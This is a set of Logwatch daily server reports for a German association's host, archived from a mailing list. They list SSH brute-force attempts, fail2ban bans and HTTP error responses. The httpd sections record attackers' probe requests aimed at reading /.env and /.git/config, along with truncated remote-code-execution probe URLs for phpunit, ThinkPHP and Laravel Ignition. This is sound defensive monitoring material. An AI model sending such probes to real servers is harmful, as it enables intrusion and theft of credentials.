4 times 104.236.124.45: 46 times 104.248.13.213: 1 time 104.248.144.65: 56 times 106.12.30.57: 33 times 106.12.107.61: 15 times 106.12.185.16: 36 times 106.13.217.124: 61 times 106.75.15.152: 48 times 106.241.33.158: 1 time 111.230.204.113: 27 times 114.7.124.134 (114-7-124-134.resources.indosat.com): 1 time 114.67.95.121: 60 times 114.67.105.113: 70 times 117.50.45.241: 1 time 118.89.235.217: 41 times 118.125.106.12: 15 times 119.28.194.66: 63 times 119.29.183.138: 44 times 119.45.222.118: 31 times 119.45.242.37: 41 times 120.48.31.123: 68 times 123.207.78.83: 10 times 124.156.133.54: 1 time 124.205.84.8: 1 time 128.199.116.139: 36 times 128.199.129.68: 53 times 129.211.124.204: 22 times 129.226.170.65: 32 times 132.232.89.186: 51 times 133.130.118.86 (v133-130-118-86.a049.g.tyo1.static.cnode.io): 59 times 134.122.19.213 (dev.pana.mirror): 33 times 134.209.155.240: 1 time 138.68.40.92: 1 time 138.94.192.131 (customer-138-94-192-131.agtnet.com.br): 6 times 139.59.3.114 (dev.mobibooks.in): 62 times 139.59.72.206: 56 times 139.129.108.135: 1 time 139.215.217.181 (181.217.215.139.adsl-pool.jlccptt.net.cn): 65 times 141.98.80.70: 1 time 141.98.80.83: 1 time 144.91.84.171 (vmi501273.contaboserver.net): 228 times 144.217.15.88 (88.ip-144-217-15.net): 9 times 144.217.243.216 (216.ip-144-217-243.net): 58 times 149.56.80.91 (ip91.ip-149-56-80.net): 57 times 149.56.130.248 (248.ip-149-56-130.net): 83 times 150.136.21.3: 72 times 151.80.146.85 (85.ip-151-80-146.eu): 10 times 157.230.33.158: 42 times 157.230.55.192: 1 time 157.230.215.145: 64 times 159.75.115.172: 35 times 159.89.202.95: 4 times 159.203.181.218: 66 times 161.35.49.78: 47 times 165.227.46.89: 16 times 165.227.119.220 (smtp.algonews.space): 32 times 165.227.163.85: 33 times 165.227.165.102 (bigarena.net): 92 times 167.160.188.190 (167.160.188.190.static.quadranet.com): 25 times 172.81.239.224: 40 times 176.109.0.30: 33 times 176.235.221.83: 61 times 177.69.119.161 (smtp2.visto-web.com.br): 42 times 178.154.228.6: 9 times 179.127.167.201: 46 times 180.76.161.127: 55 times 181.49.118.185: 1 time 182.52.90.164 (node-hwk.pool-182-52.dynamic.totinternet.net): 51 times 182.254.150.136: 43 times 183.239.21.44: 39 times 188.131.135.227: 59 times 188.254.0.172: 60 times 191.255.210.82 (191-255-210-82.dsl.telesp.net.br): 40 times 192.144.230.43: 13 times 192.144.254.35: 1 time 192.241.185.120: 36 times 194.152.206.47: 62 times 195.43.3.231 (msr-pc04.msr.sci.eg): 7 times 195.54.160.250: 1 time 202.61.133.80: 1 time 203.46.223.176: 45 times 203.195.141.177: 48 times 206.189.122.104: 65 times 209.141.35.155 (zeta.serubin.net): 60 times 210.71.232.236 (210-71-232-236.HINET-IP.hinet.net): 56 times 210.147.152.88 (FL1-210-147-152-88.kng.mesh.ad.jp): 40 times 211.252.87.42: 51 times 212.64.3.194: 41 times 218.30.91.130: 45 times 218.92.0.133: 6 times 218.92.0.138: 6 times 218.92.0.165: 18 times 218.92.0.171: 18 times 218.92.0.184: 6 times 218.92.0.248: 18 times 218.95.182.38: 1 time 221.0.94.20: 37 times 221.181.185.140: 12 times 221.181.185.143: 24 times 221.213.129.46: 52 times 221.231.125.146: 26 times 222.187.238.87: 18 times 222.239.124.19: 1 time 223.113.4.34: 1 time 223.255.28.203: 54 times Illegal users from: undef: 21 times 49.205.84.209 (broadband.actcorp.in): 15 times 54.39.16.73 (ns555166.ip-54-39-16.net): 2 times 65.49.20.68 (scan-19.shadowserver.org): 1 time 73.15.44.227 (c-73-15-44-227.hsd1.ca.comcast.net): 4 times 77.69.205.18 (dynamic.ip.77.69.205.18.batelco.com.bh): 2 times 141.98.80.69: 2 times 141.98.80.70: 1 time 141.98.80.71: 2 times 141.98.80.82: 2 times 141.98.80.83: 1 time 141.98.80.85: 2 times 178.253.237.18 (free-237-18.mediaworksit.net): 1 time 195.54.160.250: 2 times 200.216.31.20: 1 time 206.189.2.121: 3 times 221.0.94.20: 7 times **Unmatched Entries** fatal: no matching cipher found: client aes256-cbc,rijndael-cbc(a)lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 1 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop47755p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

4 Jahre, 7 Monate

1
0
0 / 0

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Wed Feb 24 04:42:03 2021 Date Range Processed: yesterday ( 2021-Feb-23 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [184:184] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 222.186.136.150 -> zapf.wiki:443: 2 Time(s) A total of 7 sites probed the server 222.186.136.150 37.49.229.191 52.89.92.80 54.234.159.100 61.219.11.153 64.227.23.46 68.183.10.58 Requests with error response codes 400 Bad Request null: 9 Time(s) /socket.io/?noteId=uAPQnP-nRVmrMa1L4sp2jQ& ... T_lM_WvFcDrADiK: 2 Time(s) /socket.io/?noteId=uAPQnP-nRVmrMa1L4sp2jQ& ... Wv87Qer2fpAADiM: 2 Time(s) mstshash=Administr: 2 Time(s) zapf.wiki:443: 2 Time(s) /socket.io/?noteId=uAPQnP-nRVmrMa1L4sp2jQ& ... -2p7nujWDcmADiL: 1 Time(s) P\xB8H\xFC)\xD2c\x8E\x9D\xFB\x84\xBA\xB6\x ... (\xC0#\xC0'\xC0: 1 Time(s) \xFB\x8A\x5C\x83\xD2!\xFB5: 1 Time(s) 404 Not Found /robots.txt: 118 Time(s) /wp-login.php: 5 Time(s) /berichte/WiSe14/Bericht_WiSe14-Bremen.pdf: 2 Time(s) /home/verein: 2 Time(s) /protokolle/Protokoll_MV_2019_01_11_Freiburg.pdf: 2 Time(s) /.env: 1 Time(s) /download/reader_aa87.pdf: 1 Time(s) /download/zapfev_satzung.pdf: 1 Time(s) /home/zapf: 1 Time(s) /neuigkeiten/einladung-mgv-ss2011: 1 Time(s) /neuigkeiten/einladung-zapf-sose2011: 1 Time(s) /reader/1995-wi-reader_bn95.pdf: 1 Time(s) /resolutionen/sose17/gesellschaftlich_vera ... wantwortung.pdf: 1 Time(s) /sites/default/files/2006_SoSe_Dresden.pdf: 1 Time(s) /sites/default/files/2011_SoSe_Dresden.pdf: 1 Time(s) /xmlrpc.php: 1 Time(s) 499 (undefined) /socket.io/?noteId=uAPQnP-nRVmrMa1L4sp2jQ& ... -2p7nujWDcmADiL: 1 Time(s) /socket.io/?noteId=uAPQnP-nRVmrMa1L4sp2jQ& ... T_lM_WvFcDrADiK: 1 Time(s) /socket.io/?noteId=uAPQnP-nRVmrMa1L4sp2jQ& ... Wv87Qer2fpAADiM: 1 Time(s) 500 Internal Server Error /: 78 Time(s) /robots.txt: 9 Time(s) /atom.xml: 7 Time(s) /sitemap_index.xml: 7 Time(s) /.env: 6 Time(s) /sitemap.txt: 6 Time(s) /sitemap.xml: 6 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 4 Time(s) /?XDEBUG_SESSION_START=phpstorm: 2 Time(s) /Autodiscover/Autodiscover.xml: 2 Time(s) /_ignition/execute-solution: 2 Time(s) /api/jsonws/invoke: 2 Time(s) /console/: 2 Time(s) /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 2 Time(s) /mifs/.;/services/LogService: 2 Time(s) /sitemap.xml.gz: 2 Time(s) /wp-content/plugins/wp-file-manager/readme.txt: 2 Time(s) /admin//config.php: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /sitemaps.xml: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (vmi501273.contaboserver.net): 401 Time(s) unknown (138.197.193.191): 278 Time(s) root (159.75.42.65): 70 Time(s) root (177.22.35.126): 70 Time(s) root (thebitcoin.exchange): 69 Time(s) root (109.ip-51-91-100.eu): 68 Time(s) root (211.184.187.129): 66 Time(s) root (5.3.6.82): 66 Time(s) root (157.245.81.242): 64 Time(s) root (139.59.158.239): 63 Time(s) root (vps-75e1d53d.vps.ovh.net): 63 Time(s) root (178.128.147.114): 62 Time(s) root (212.33.250.241): 62 Time(s) root (4.ip-144-217-85.net): 62 Time(s) root (h-212-156.a357.priv.bahnhof.se): 62 Time(s) root (vps-a4a0af34.vps.ovh.ca): 62 Time(s) root (haztech.com.my): 61 Time(s) root (112.217.11.203): 60 Time(s) root (178.128.84.47): 60 Time(s) root (45.240.88.197): 60 Time(s) root (109.227.63.3): 59 Time(s) root (138.197.69.184): 59 Time(s) root (212.64.91.114): 59 Time(s) root (65.151.188.94): 59 Time(s) root (82.196.5.221): 59 Time(s) root (103.105.130.136): 58 Time(s) root (61.155.138.100): 58 Time(s) root (181.49.118.185): 57 Time(s) root (207.154.243.194): 57 Time(s) root (61.178.178.156): 57 Time(s) root (116-59-25-201.emome-ip.hinet.net): 56 Time(s) root (139.59.244.237): 56 Time(s) root (159.65.30.66): 56 Time(s) root (218.245.1.169): 56 Time(s) root (106.75.169.24): 55 Time(s) root (138.197.130.138): 55 Time(s) root (182.18.144.99): 55 Time(s) root (68.183.188.159): 55 Time(s) root (128.199.94.218): 54 Time(s) root (139.59.102.170): 53 Time(s) root (189.254.242.60): 53 Time(s) root (159.89.114.40): 52 Time(s) root (181.126.83.37): 52 Time(s) root (61.164.41.76): 52 Time(s) root (111.204.204.72): 51 Time(s) root (101.36.178.20): 49 Time(s) root (180.76.148.87): 49 Time(s) root (120.131.9.167): 47 Time(s) root (132.232.4.33): 47 Time(s) root (118.123.244.100): 46 Time(s) root (49.234.59.246): 46 Time(s) root (128.199.228.115): 45 Time(s) root (139.59.31.173): 44 Time(s) root (185.91.142.202): 42 Time(s) root (42.194.203.226): 42 Time(s) root (49.235.29.185): 41 Time(s) root (81.68.212.67): 41 Time(s) root (106.13.89.74): 40 Time(s) root (152.136.16.233): 40 Time(s) root (120.53.12.94): 39 Time(s) root (206.221.80.253): 39 Time(s) root (117.51.150.202): 38 Time(s) root (111.67.199.85): 37 Time(s) root (161.35.227.204): 37 Time(s) root (150.136.162.158): 36 Time(s) root (68.168.142.29.16clouds.com): 36 Time(s) root (119.28.9.138): 35 Time(s) root (193.112.160.226): 35 Time(s) root (81.69.58.254): 35 Time(s) root (143.110.190.26): 34 Time(s) root (152.136.179.135): 34 Time(s) root (94.57.252.147): 34 Time(s) root (49.232.161.221): 33 Time(s) root (82.156.111.238): 33 Time(s) root (96-91-109-121-static.hfc.comcastbusiness.net): 32 Time(s) root (106.52.54.192): 31 Time(s) root (157.245.89.43): 30 Time(s) root (181.40.122.2): 29 Time(s) root (106.52.214.183): 28 Time(s) root (mail.swedmobil.ru): 27 Time(s) root (115.159.71.95): 26 Time(s) root (189.20.98.204): 24 Time(s) root (81.71.83.218): 24 Time(s) root (smtp.swedmobil.ru): 24 Time(s) root (165.227.46.89): 22 Time(s) unknown (218.60.39.190): 22 Time(s) root (128.199.116.139): 21 Time(s) root (119.29.85.229): 20 Time(s) root (bl21-166-137.dsl.telepac.pt): 20 Time(s) root (157.230.231.39): 19 Time(s) root (165.227.163.85): 18 Time(s) root (52.149.180.228): 18 Time(s) root (212.64.3.194): 17 Time(s) root (218.60.39.190): 16 Time(s) root (221.181.185.143): 16 Time(s) root (107.182.176.142.16clouds.com): 14 Time(s) root (net-2-45-185-2.cust.vodafonedsl.it): 13 Time(s) root (222.187.238.87): 12 Time(s) root (222.187.239.31): 12 Time(s) root (45-14-10-16.pool.giganet.hu): 12 Time(s) root (119.84.128.25): 11 Time(s) root (102.38.50.50): 10 Time(s) root (139.215.208.125): 10 Time(s) root (49.232.43.126): 8 Time(s) root (13.92.232.23): 6 Time(s) root (161.35.218.118): 6 Time(s) root (221.181.185.140): 6 Time(s) root (64.225.112.216): 6 Time(s) root (1.234.58.166): 5 Time(s) unknown (45.146.165.213): 5 Time(s) bin (138.197.193.191): 4 Time(s) root (138.197.193.191): 4 Time(s) root (121.4.207.159): 3 Time(s) root (149.129.97.102): 3 Time(s) root (45.93.201.193): 3 Time(s) unknown (45.93.201.193): 3 Time(s) unknown (jiffix.com.ng): 3 Time(s) unknown (v118-27-4-225.o4kn.static.cnode.io): 3 Time(s) postgres (138.197.193.191): 2 Time(s) root (175.100.138.49): 2 Time(s) unknown (141.98.80.29): 2 Time(s) unknown (141.98.80.90): 2 Time(s) unknown (141.98.80.93): 2 Time(s) unknown (195.54.160.250): 2 Time(s) unknown (rosaluxemburg.tor-exit.calyxinstitute.org): 2 Time(s) news (138.197.193.191): 1 Time(s) root (101.32.208.137): 1 Time(s) root (114.69.244.238): 1 Time(s) root (115.68.49.169): 1 Time(s) root (119.29.199.247): 1 Time(s) root (119.45.250.197): 1 Time(s) root (121.5.36.65): 1 Time(s) root (121.5.65.156): 1 Time(s) root (122.114.116.59): 1 Time(s) root (124.205.84.15): 1 Time(s) root (141.98.80.89): 1 Time(s) root (141.98.80.91): 1 Time(s) root (141.98.80.92): 1 Time(s) root (162.241.121.37): 1 Time(s) root (163.172.167.225): 1 Time(s) root (180.76.227.138): 1 Time(s) root (191.209.88.62): 1 Time(s) root (200.122.249.203): 1 Time(s) root (221.122.78.202): 1 Time(s) root (27.128.160.79): 1 Time(s) root (27.ip-51-68-226.eu): 1 Time(s) root (46.101.103.207): 1 Time(s) root (49.233.100.14): 1 Time(s) root (49.7.164.54): 1 Time(s) root (57.ip-51-83-73.eu): 1 Time(s) root (81.70.197.147): 1 Time(s) root (87.110.181.30): 1 Time(s) root (host-186-4-136-153.netlife.ec): 1 Time(s) root (v118-27-4-225.o4kn.static.cnode.io): 1 Time(s) root (vps-fbabd881.vps.ovh.net): 1 Time(s) temp (138.197.193.191): 1 Time(s) unknown (141.98.80.89): 1 Time(s) unknown (141.98.80.91): 1 Time(s) unknown (141.98.80.92): 1 Time(s) unknown (39.153.132.29): 1 Time(s) unknown (mailcloud.rapidcompute.com): 1 Time(s) www-data (195.54.160.250): 1 Time(s) Invalid Users: Unknown Account: 329 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 366 Miscellaneous warnings 18.052K Bytes accepted 18,485 18.052K Bytes sent via SMTP 18,485 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 1 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 1 Total 4xx Rejects 100.00% ======== ================================================== 415 Connections 366 Connections lost (inbound) 415 Disconnections 1 Removed from queue 1 Sent via SMTP 1 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 2 Time(s) Failed logins from: 1.234.58.166: 5 times 2.45.185.2 (net-2-45-185-2.cust.vodafonedsl.it): 13 times 2.82.166.137 (bl21-166-137.dsl.telepac.pt): 20 times 5.3.6.82 (5x3x6x82.static.ertelecom.ru): 66 times 13.92.232.23: 6 times 27.128.160.79: 1 time 42.194.203.226: 42 times 45.14.10.16 (45-14-10-16.pool.giganet.hu): 12 times 45.93.201.193: 3 times 45.240.88.197: 60 times 46.101.103.207: 1 time 49.7.164.54: 1 time 49.232.43.126: 8 times 49.232.161.221: 33 times 49.233.100.14: 1 time 49.234.59.246: 46 times 49.235.29.185: 41 times 51.68.226.27 (27.ip-51-68-226.eu): 1 time 51.79.66.92 (vps-a4a0af34.vps.ovh.ca): 62 times 51.83.73.57 (57.ip-51-83-73.eu): 1 time 51.91.100.109 (109.ip-51-91-100.eu): 68 times 51.178.139.41 (vps-fbabd881.vps.ovh.net): 1 time 51.195.139.169 (vps-75e1d53d.vps.ovh.net): 63 times 52.149.180.228: 18 times 61.155.138.100: 58 times 61.164.41.76: 52 times 61.178.178.156: 57 times 64.225.112.216: 6 times 65.151.188.94: 59 times 68.168.142.29 (68.168.142.29.16clouds.com): 36 times 68.183.188.159: 55 times 81.68.212.67: 41 times 81.69.58.254: 35 times 81.70.197.147: 1 time 81.71.83.218: 24 times 82.156.111.238: 33 times 82.196.5.221: 59 times 87.110.181.30: 1 time 94.57.252.147: 34 times 96.91.109.121 (96-91-109-121-static.hfc.comcastbusiness.net): 32 times 98.128.212.156 (h-212-156.A357.priv.bahnhof.se): 62 times 101.32.208.137: 1 time 101.36.178.20: 49 times 102.38.50.50: 10 times 103.105.130.136 (IP-130-136.nap.net.id): 58 times 106.13.89.74: 40 times 106.52.54.192: 31 times 106.52.214.183: 28 times 106.75.169.24: 55 times 107.182.176.142 (107.182.176.142.16clouds.com): 14 times 109.227.63.3 (srv-109-227-63-3.static.a1.hr): 59 times 111.67.199.85: 37 times 111.204.204.72: 51 times 112.217.11.203: 60 times 114.69.244.238: 1 time 115.68.49.169: 1 time 115.159.71.95: 26 times 116.59.25.201 (116-59-25-201.emome-ip.hinet.net): 56 times 117.51.150.202: 38 times 118.27.4.225 (v118-27-4-225.o4kn.static.cnode.io): 1 time 118.123.244.100: 46 times 119.28.9.138: 35 times 119.29.85.229: 20 times 119.29.199.247: 1 time 119.45.250.197: 1 time 119.84.128.25: 11 times 120.53.12.94: 39 times 120.131.9.167: 47 times 121.4.207.159: 3 times 121.5.36.65: 1 time 121.5.65.156: 1 time 122.114.116.59: 1 time 124.205.84.15: 1 time 128.199.94.218: 54 times 128.199.116.139: 21 times 128.199.228.115: 45 times 132.232.4.33: 47 times 134.209.106.190 (haztech.com.my): 61 times 138.197.69.184: 59 times 138.197.130.138 (shitcointopia-grana.com.py-clima.grana.com.py): 55 times 138.197.193.191: 12 times 139.59.31.173: 44 times 139.59.102.170: 53 times 139.59.158.239: 63 times 139.59.244.237: 56 times 139.215.208.125 (125.208.215.139.adsl-pool.jlccptt.net.cn): 10 times 141.98.80.89: 1 time 141.98.80.91: 1 time 141.98.80.92: 1 time 143.110.190.26: 34 times 144.91.84.171 (vmi501273.contaboserver.net): 401 times 144.217.85.4 (4.ip-144-217-85.net): 62 times 149.129.97.102: 3 times 150.136.162.158: 36 times 152.136.16.233: 40 times 152.136.179.135: 34 times 157.230.231.39 (singulart.tech-ubuntu-s-1vcpu-1gb-nyc1-01): 19 times 157.245.81.242: 64 times 157.245.89.43: 30 times 159.65.30.66: 56 times 159.75.42.65: 70 times 159.89.114.40: 52 times 159.203.184.19 (thebitcoin.exchange): 69 times 161.35.218.118: 6 times 161.35.227.204: 37 times 162.241.121.37 (mail-lb1-int.dca2.superb.net): 1 time 163.172.167.225 (225-167-172-163.instances.scw.cloud): 1 time 165.227.46.89: 22 times 165.227.163.85: 18 times 175.100.138.49 (49-138-100-175.static.youbroadband.in): 2 times 177.22.35.126: 70 times 178.128.84.47: 60 times 178.128.147.114: 62 times 180.76.148.87: 49 times 180.76.227.138: 1 time 181.40.122.2 (static-2-122-40-181.telecel.com.py): 29 times 181.49.118.185: 57 times 181.126.83.37 (pool-37-83-126-181.telecel.com.py): 52 times 182.18.144.99 (static-182-18-144-99.ctrls.in): 55 times 185.91.142.202 (subscr-202.pool-142.microweb.hu): 42 times 186.4.136.153 (host-186-4-136-153.netlife.ec): 1 time 189.20.98.204 (189-20-98-204.customer.tdatabrasil.net.br): 24 times 189.254.242.60 (correo.capitaldezacatecas.gob.mx): 53 times 191.209.88.62 (191-209-88-62.user.vivozap.com.br): 1 time 193.112.160.226: 35 times 195.54.160.250: 1 time 200.122.249.203 (static-dedicado-200-122-249-203.une.net.co): 1 time 206.221.80.253: 39 times 207.154.243.194: 57 times 211.184.187.129: 66 times 212.33.250.241 (212x33x250x241.static-business.perm.ertelecom.ru): 62 times 212.64.3.194: 17 times 212.64.91.114: 59 times 212.119.190.162 (smtp.swedmobil.ru): 51 times 218.60.39.190: 16 times 218.245.1.169: 56 times 221.122.78.202: 1 time 221.181.185.140: 6 times 221.181.185.143: 18 times 222.187.238.87: 12 times 222.187.239.31: 12 times Illegal users from: undef: 194 times 39.153.132.29: 1 time 45.93.201.193: 3 times 45.146.165.213: 5 times 65.49.20.68 (scan-19.shadowserver.org): 1 time 118.27.4.225 (v118-27-4-225.o4kn.static.cnode.io): 3 times 138.197.193.191: 278 times 139.162.122.110 (scan-8.security.ipip.net): 1 time 141.98.80.29: 2 times 141.98.80.89: 1 time 141.98.80.90: 2 times 141.98.80.91: 1 time 141.98.80.92: 1 time 141.98.80.93: 2 times 162.247.74.206 (rosaluxemburg.tor-exit.calyxinstitute.org): 2 times 175.107.195.21 (mailcloud.rapidcompute.com): 1 time 188.166.41.52 (jiffix.com.ng): 3 times 195.54.160.250: 2 times 218.60.39.190: 22 times ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop47755p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

4 Jahre, 7 Monate

1
0
0 / 0

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Tue Feb 23 04:42:04 2021 Date Range Processed: yesterday ( 2021-Feb-22 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [173:172] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ A total of 8 sites probed the server 103.145.13.118 135.125.161.252 149.81.137.136 192.241.223.60 3.25.232.246 61.219.11.153 66.240.205.34 78.189.227.140 Requests with error response codes 400 Bad Request null: 11 Time(s) /: 1 Time(s) /0bef: 1 Time(s) \xA0\xB0s: 1 Time(s) mstshash=Administr: 1 Time(s) 403 Forbidden /.git/HEAD: 5 Time(s) /.git/config: 1 Time(s) /resolutionen/sose17/gesellschaftlich_verantwortung/: 1 Time(s) 404 Not Found /robots.txt: 26 Time(s) /.git/HEAD: 5 Time(s) /wp-login.php: 2 Time(s) /download/reader_bw92.pdf: 1 Time(s) /download/reader_hb02.pdf: 1 Time(s) /download/reader_ka99.pdf: 1 Time(s) /download/reader_ma91.pdf: 1 Time(s) /download/reader_ma97.pdf: 1 Time(s) /download/reader_re94.pdf: 1 Time(s) /download/zapfev_satzung.pdf: 1 Time(s) /protokolle/Protokoll_MV_12.11.2016.pdf: 1 Time(s) /sites/default/files/1987_SoSe_Aachen.pdf: 1 Time(s) /sites/default/files/1995_SoSe_Hannover.pdf: 1 Time(s) /sites/default/files/2001_SoSe_Erlangen.pdf: 1 Time(s) /sites/default/files/2003_WiSe_Bochum.pdf: 1 Time(s) /sites/default/files/2004_WiSe_Hamburg.pdf: 1 Time(s) /sites/default/files/2005_SoSe_Erlangen.pdf: 1 Time(s) /sites/default/files/2011_WiSe_Bonn.pdf: 1 Time(s) /sites/default/files/Empfehlungen_der_ZaPF ... 7CStellungnahme: 1 Time(s) 500 Internal Server Error /: 28 Time(s) /atom.xml: 10 Time(s) /robots.txt: 10 Time(s) /sitemap_index.xml: 10 Time(s) /sitemap.txt: 9 Time(s) /sitemap.xml: 8 Time(s) /sitemap.xml.gz: 7 Time(s) /.env: 4 Time(s) /sitemaps.xml: 3 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s) //login_sid.lua: 1 Time(s) /?XDEBUG_SESSION_START=phpstorm: 1 Time(s) /Autodiscover/Autodiscover.xml: 1 Time(s) /_ignition/execute-solution: 1 Time(s) /actuator/health: 1 Time(s) /admin//config.php: 1 Time(s) /api/jsonws/invoke: 1 Time(s) /console/: 1 Time(s) /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s) /login: 1 Time(s) /mifs/.;/services/LogService: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /wp-content/plugins/wp-file-manager/readme.txt: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: unknown (vmi501273.contaboserver.net): 179 Time(s) root (116.126.85.123): 70 Time(s) root (157.245.212.8): 70 Time(s) root (174.138.20.105): 70 Time(s) root (189.14.124.17): 70 Time(s) root (68.166.173.62.host.static.ip.kpnqwest.it): 65 Time(s) root (163.172.157.193): 64 Time(s) root (192.ip-145-239-82.eu): 64 Time(s) root (62.4.16.39): 64 Time(s) root (120.48.12.77): 63 Time(s) root (46.164.143.82): 63 Time(s) root (49.51.180.170): 63 Time(s) root (track1.glovision.co): 63 Time(s) root (vps-fbabd881.vps.ovh.net): 63 Time(s) root (104.131.186.240): 62 Time(s) root (195.216.207.22): 62 Time(s) root (41.ip-51-255-35.eu): 62 Time(s) root (46.ip-51-178-47.eu): 62 Time(s) root (102.38.50.50): 60 Time(s) root (111.67.194.41): 60 Time(s) root (61.2.243.4): 58 Time(s) root (server.amazonusaa.cf): 58 Time(s) root (119.45.243.232): 57 Time(s) root (4.17.231.207): 57 Time(s) root (124.90.52.90): 56 Time(s) root (ellementry360degree.com): 56 Time(s) root (115.159.216.109): 55 Time(s) root (142.93.3.47): 55 Time(s) postgres (vmi501273.contaboserver.net): 54 Time(s) root (103.246.240.30): 54 Time(s) root (112.6.121.116): 54 Time(s) root (116.232.81.158): 54 Time(s) root (115.159.56.151): 53 Time(s) root (202.126.93.131): 53 Time(s) root (190.24.6.162): 52 Time(s) root (124.156.105.251): 51 Time(s) root (46.101.194.220): 51 Time(s) root (106.13.30.226): 50 Time(s) root (119.45.116.10): 50 Time(s) root (191.209.88.62): 50 Time(s) root (181.16.17.224): 49 Time(s) root (106.52.70.240): 48 Time(s) root (177.140.196.172): 48 Time(s) root (222.112.186.86): 48 Time(s) root (net-2-45-185-2.cust.vodafonedsl.it): 48 Time(s) root (119.29.74.28): 47 Time(s) root (115.159.209.172): 45 Time(s) root (132.232.59.78): 45 Time(s) root (167.172.154.233): 45 Time(s) root (36.89.140.123): 45 Time(s) root (134.122.130.38): 44 Time(s) root (188.166.158.69): 44 Time(s) mysql (vmi501273.contaboserver.net): 43 Time(s) root (49.232.223.172): 42 Time(s) root (171.84.2.6): 40 Time(s) root (221.213.129.46): 40 Time(s) root (81.68.215.10): 40 Time(s) root (81.70.99.146): 40 Time(s) root (106.53.135.98): 39 Time(s) root (119.45.10.5): 39 Time(s) root (139.215.208.125): 39 Time(s) root (120.53.227.201): 38 Time(s) root (121.4.162.82): 38 Time(s) root (42.193.102.218): 38 Time(s) root (49.235.41.58): 38 Time(s) root (host-81-86-82-68.static.as9105.net): 38 Time(s) root (122.51.248.146): 37 Time(s) root (119.84.128.25): 36 Time(s) root (132.232.143.211): 36 Time(s) root (139.186.143.194): 34 Time(s) root (106.75.122.38): 31 Time(s) root (119.29.115.153): 30 Time(s) root (129.204.125.231): 30 Time(s) root (191.205.248.196): 30 Time(s) root (36.156.154.218): 30 Time(s) unknown (40.ip-144-217-13.net): 30 Time(s) root (81.69.33.14): 29 Time(s) root (206.189.138.29): 28 Time(s) root (48-233-24-185.static.servebyte.com): 28 Time(s) root (49.234.28.149): 28 Time(s) root (222.187.239.31): 26 Time(s) root (vps-0ae1031a.vps.ovh.net): 25 Time(s) root (206.189.160.233): 23 Time(s) root (40.ip-144-217-13.net): 23 Time(s) root (170.106.35.43): 22 Time(s) root (222.187.238.87): 21 Time(s) root (81.71.136.41): 19 Time(s) root (177-56-186-115.3g.claro.net.br): 18 Time(s) root (132.232.120.145): 16 Time(s) unknown (45.146.164.79): 16 Time(s) unknown (81.17.30.198): 16 Time(s) root (net-93-149-180-144.cust.vodafonedsl.it): 15 Time(s) root (221.181.185.143): 14 Time(s) root (81.70.224.17): 14 Time(s) root (112.215.113.11): 13 Time(s) root (192.241.185.120): 9 Time(s) postfix (vmi501273.contaboserver.net): 8 Time(s) root (vmi501273.contaboserver.net): 8 Time(s) root (187.95.124.103): 7 Time(s) root (static-n49-176-146-35.meb4.vic.optusnet.com.au): 7 Time(s) root (177.220.173.134): 6 Time(s) root (198.199.103.79): 4 Time(s) root (81.17.30.198): 4 Time(s) root (175.100.138.49): 3 Time(s) root (81.161.63.100): 3 Time(s) unknown (171.239.254.84): 3 Time(s) unknown (194.61.25.28): 3 Time(s) unknown (195.54.160.250): 3 Time(s) root (170.106.82.81): 2 Time(s) root (194.61.25.28): 2 Time(s) root (2.57.90.33): 2 Time(s) root (4.ip-144-217-85.net): 2 Time(s) root (81.161.63.101): 2 Time(s) root (81.161.63.103): 2 Time(s) unknown (171.251.31.102): 2 Time(s) unknown (183.97.39.5): 2 Time(s) unknown (45.93.201.193): 2 Time(s) news (vmi501273.contaboserver.net): 1 Time(s) openldap (vmi501273.contaboserver.net): 1 Time(s) root (106.53.236.114): 1 Time(s) root (111.231.55.75): 1 Time(s) root (115.159.142.211): 1 Time(s) root (119.39.54.6): 1 Time(s) root 